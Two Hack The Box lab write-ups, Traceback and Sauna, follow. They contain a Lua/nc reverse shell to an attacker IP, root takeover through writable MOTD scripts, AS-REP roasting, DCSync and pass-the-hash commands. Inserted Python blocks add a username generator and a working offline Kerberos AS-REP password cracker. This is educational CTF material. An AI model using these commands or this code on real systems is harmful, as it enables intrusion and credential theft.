Hack the Box - Traceback Writeup

System Summary


Initial Enumeration

The nmap scan reveals only SSH and HTTP


The web server serves a simple page:

Looking at the GitHub repos of the box creator (https://github.com/Xh4H/Web-Shells) we can see a webshell collection.
Trying the file names from that collection against the Traceback machine, we find one that is present:


Initial Foothold

Using admin:admin we get access to a panel that lets us upload files, list directory contents and so on.



Our first objective is to upload a PHP reverse shell (there are many on the internet) and catch the connection with a listener:




We're in as user webadmin.
The next step is to enumerate the other users.

User Flag

There is another user named sysadmin:

There is a note file in the webadmin home:

Lua is a scripting language, and luvit is a Lua runtime.
It also turns out that user webadmin can run luvit as user sysadmin via sudo without a password.

The obvious step here is to create a Lua script such as /tmp/nik.lua that spawns a reverse shell (a listener must already be waiting on 10.10.16.78:5555):

 os.execute("rm /tmp/nik;mkfifo /tmp/nik;cat /tmp/nik|/bin/sh -i 2>&1|nc 10.10.16.78 5555 >/tmp/nik")

and run it as

 sudo -u sysadmin /home/sysadmin/luvit /tmp/nik.lua


And we get a shell as sysadmin.

Root Flag

As sysadmin the next step is enumeration with tools like LinEnum or similar.
But it seems that there is nothing interesting.
Looking at the running processes with pspy, we can see a recurring task:

There is a process (running as root) that copies the files from /var/backups/.update-motd.d/ to /etc/update-motd.d/ every minute.
Interesting... it looks like something that restores those files if they get modified.

In fact, user sysadmin can modify the files in /etc/update-motd.d/:

The interesting thing is that sshd (through pam_motd) runs these scripts as root to build the MOTD and the additional messages shown to every new SSH session.

So we can modify one of the files above to run a command as root and gain access, but we have to be fast: within a minute the file will be restored from the backup copy.
The sequence of operations is:

  • Add our public SSH key to /home/sysadmin/.ssh/authorized_keys (so we can log in over SSH, and keep access for later)

  • Append our payload to one of the MOTD scripts, to be executed at the next SSH login:
    echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header

  • Log in as sysadmin over SSH (this works because we added our key). The login runs the MOTD scripts as root, and with them our cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/authorized_keys

  • Log in as root over SSH (the previous step copied our key into root's authorized_keys)


Hack The Box - Sauna Writeup

Machine summary


Enumeration phase

Since it's a Windows box I first ran enum4linux with no arguments, and the only information I got was the domain name: EGOTISTICALBANK

Scanning with nmap for open ports:

We can see that the LDAP port is open, which means this should be a domain controller.
But port 80 is also open, so it's worth taking a look at the web page:
Nothing useful here, just a couple of forms in "Apply now" and "Contact Us".
Maybe the team page can help:

Initial Foothold and User escalation 


From the names on the team page I compiled a list of username combinations like

  • s.driver
  • sdriver
  • sophie.driver
  • h.bear
  • ...
Then I used kerbrute to enumerate valid users against the DC with that list:
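As an added example (written for this edit, not the author's tooling), here is a small Python generator that produces the username formats listed above from "First Last" names, so the output file can be fed straight to kerbrute. The names in the block are constructed sample input, not data taken from the page.

```python
# Added example, not from the original writeup: build a kerbrute user list
# from "First Last" names taken off a team/about page.
# The names in __main__ are constructed sample input, not data from the page.
from typing import Iterable, List


def username_candidates(full_names: Iterable[str]) -> List[str]:
    """Return common AD username formats for each 'First Last' name.

    Order is preserved and duplicates removed, so the result can be written
    as-is to a wordlist for `kerbrute userenum`.
    """
    seen = set()
    out: List[str] = []
    for name in full_names:
        parts = name.lower().split()
        if len(parts) < 2:          # need at least a first and a last name
            continue
        first, last = parts[0], parts[-1]
        fi, li = first[0], last[0]
        forms = [
            f"{fi}.{last}",         # s.driver
            f"{fi}{last}",          # sdriver
            f"{first}.{last}",      # sophie.driver
            f"{first}{last}",       # sophiedriver
            f"{first}_{last}",      # sophie_driver
            f"{first}{li}",         # sophied
            f"{last}{fi}",          # drivers
            f"{last}.{first}",      # driver.sophie
            f"{fi}{li}",            # sd
            first,                  # sophie
            last,                   # driver
        ]
        for form in forms:
            if form not in seen:
                seen.add(form)
                out.append(form)
    return out


def write_wordlist(path: str, names: Iterable[str]) -> int:
    """Write one username per line; returns the number of lines written."""
    names = list(names)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return len(names)


if __name__ == "__main__":
    # Constructed sample names (assumption: what a team page would list).
    team = ["Sophie Driver", "Hugo Bear"]
    users = username_candidates(team)
    print(f"{write_wordlist('users.txt', users)} candidates written to users.txt")
    # then: kerbrute userenum -d <domain> --dc <dc-ip> users.txt
```

The list deliberately includes the bare first and last names: service and test accounts are often created that way, and kerbrute's cost per candidate is one AS-REQ, so a few extra formats are cheap.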



It turns out that the user fsmith exists.

Now I used impacket's GetNPUsers.py to request an AS-REP for fsmith: if Kerberos pre-authentication is disabled for the account, the KDC answers with a ticket encrypted with the user's password hash, which can be cracked offline (AS-REP roasting):

Saving the hash in a file like hash.txt and running hashcat (mode 18200 is Kerberos 5 AS-REP, etype 23):
 hashcat  -m 18200 --force hash.txt  rockyou.txt
It finds the password Thestrokes23 in a few seconds:
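To show what the crack above rests on, here is an added example (written for this edit; not the author's, impacket's or hashcat's code) that verifies a candidate password against an etype-23 AS-REP hash offline, following RFC 4757: NT hash of the candidate, RC4-HMAC decryption with key usage 8 (the AS-REP enc-part), then recomputation of the HMAC-MD5 checksum. It carries its own MD4 because hashlib's md4 is disabled on many OpenSSL 3 builds. The page does not reproduce the captured hash, so the block constructs a sample hash from a known password and a placeholder plaintext; the realm in the principal is an assumption.

```python
# Added example, not from the original writeup: offline check of a candidate
# password against a "$krb5asrep$23$user@REALM:checksum$edata" hash.
# RFC 4757 RC4-HMAC; the sample hash in __main__ is constructed, not captured.
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
ASREP_ENC_PART_USAGE = 8  # RFC 4757 key usage number for the AS-REP enc-part


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 of the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(48):
            j = i % 16
            if i < 16:    # round 1: words in order, no constant
                f, k, s, add = F, j, (3, 7, 11, 19)[j % 4], 0
            elif i < 32:  # round 2: words 0,4,8,12,1,5,9,13,...
                f, k, s, add = G, (j % 4) * 4 + j // 4, (3, 5, 9, 13)[j % 4], 0x5A827999
            else:         # round 3: words 0,8,4,12,2,10,6,14,...
                f, k, s, add = H, (0, 8, 4, 12)[j % 4] + (0, 2, 1, 3)[j // 4], (3, 9, 11, 15)[j % 4], 0x6ED9EBA1
            # one step, then rotate the registers so the next step works on the next slot
            a, b, c, d = d, _rotl((a + f(b, c, d) + X[k] + add) & MASK, s), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder=None) -> bytes:
    """RFC 4757 encryption: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = (confounder or os.urandom(8)) + plaintext
    checksum = _hmac_md5(k1, data)
    k3 = _hmac_md5(k1, checksum)
    return checksum + rc4(k3, data)


def rc4_hmac_decrypt(key: bytes, usage: int, edata: bytes):
    """Plaintext without the confounder, or None if the checksum does not verify."""
    checksum, cipher = edata[:16], edata[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    k3 = _hmac_md5(k1, checksum)
    data = rc4(k3, cipher)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]


def parse_asrep_hash(line: str):
    """Split the hashcat 18200 line into (principal, checksum || ciphertext)."""
    head, body = line.strip().split(":", 1)
    _, tag, etype, principal = head.split("$")
    if tag != "krb5asrep":
        raise ValueError("not a krb5asrep hash")
    if etype != "23":  # etype 17/18 is AES: a different format and hashcat mode
        raise ValueError(f"etype {etype} is not RC4-HMAC; -m 18200 does not apply")
    checksum_hex, cipher_hex = body.split("$", 1)
    return principal, bytes.fromhex(checksum_hex + cipher_hex)


def check_password(line: str, candidate: str) -> bool:
    _, edata = parse_asrep_hash(line)
    return rc4_hmac_decrypt(nt_hash(candidate), ASREP_ENC_PART_USAGE, edata) is not None


def crack(line: str, wordlist):
    """Return the first word that decrypts the enc-part, or None."""
    return next((w for w in wordlist if check_password(line, w)), None)


def make_sample_hash(principal: str, password: str) -> str:
    """Constructed test vector; a real hash carries the ASN.1 EncASRepPart here."""
    edata = rc4_hmac_encrypt(nt_hash(password), ASREP_ENC_PART_USAGE, b"constructed-enc-as-rep-part")
    return f"$krb5asrep$23${principal}:{edata[:16].hex()}${edata[16:].hex()}"


if __name__ == "__main__":
    sample = make_sample_hash("fsmith@EXAMPLE.LOCAL", "Thestrokes23")  # realm is an assumption
    print(crack(sample, ["password", "Summer2020", "Thestrokes23"]))
```

The etype check matters in practice: when the account (or the domain) only allows AES, GetNPUsers.py returns an etype 17 or 18 hash, and mode 18200 will never crack it. Real cracking is also far faster than this loop because only one MD4 per candidate and one short RC4 decryption are needed; the structure of the check is the same.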


So now we have a valid username and password, confirmed with smbclient:

With this account we can use evil-winrm (or any other WinRM client) to get a shell as fsmith:

User fsmith also has the user flag on its desktop: 1b5520b98d97cf17f24122a55baf70cf

The next step is to enumerate the users, groups and privileges in the AD domain.

Further enumeration

Maybe some of the steps below are not needed, but I wanted a good understanding of the system before acting...

Now we can see that there is also a service account, svc_loanmgr:

I can upload SharpHound.ps1 and run it:

And then copy the result locally to analyze it with BloodHound.


Below are some graphs from BloodHound:



With rpcclient we can see that there are some users:

There are only standard groups:

And the three non-standard users (fsmith, hsmith, svc_loanmgr) are members of the "Domain Users" group.

We can get the SIDs of these users:

Uploading winPEAS.exe we get some possible escalation points:
- No AV installed
- appcmd.exe is installed
- User can create folder in c:\
- LAPS not installed
- Credentialguard not enabled
- LSA Protection not enabled

Using the reg query command to read the Winlogon default (AutoLogon) username and password settings:

We can connect with

  • username: svc_loanmanager
  • password: Moneymakestheworldgoround!

Note that the registry value says svc_loanmanager, while the account enumerated earlier is svc_loanmgr; the password is valid for svc_loanmgr.
This account has a few more privileges than a standard user:

Root escalation

With the user svc_loanmgr we can dump the domain secrets with impacket's secretsdump.py (remotely this uses DCSync, so the account needs replication rights on the domain):

Once we have the NTLM hash of Administrator it's easy to pass the hash with impacket's psexec.py (the aad3b435... half is the empty LM hash):

python3 ../../impacket-master/examples/psexec.py  -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff "EGOTISTICALBANK/administrator@10.10.10.175"

and we can get a shell as administrator:

Root flag is: f3ee04965c68257382e31502cc5e881f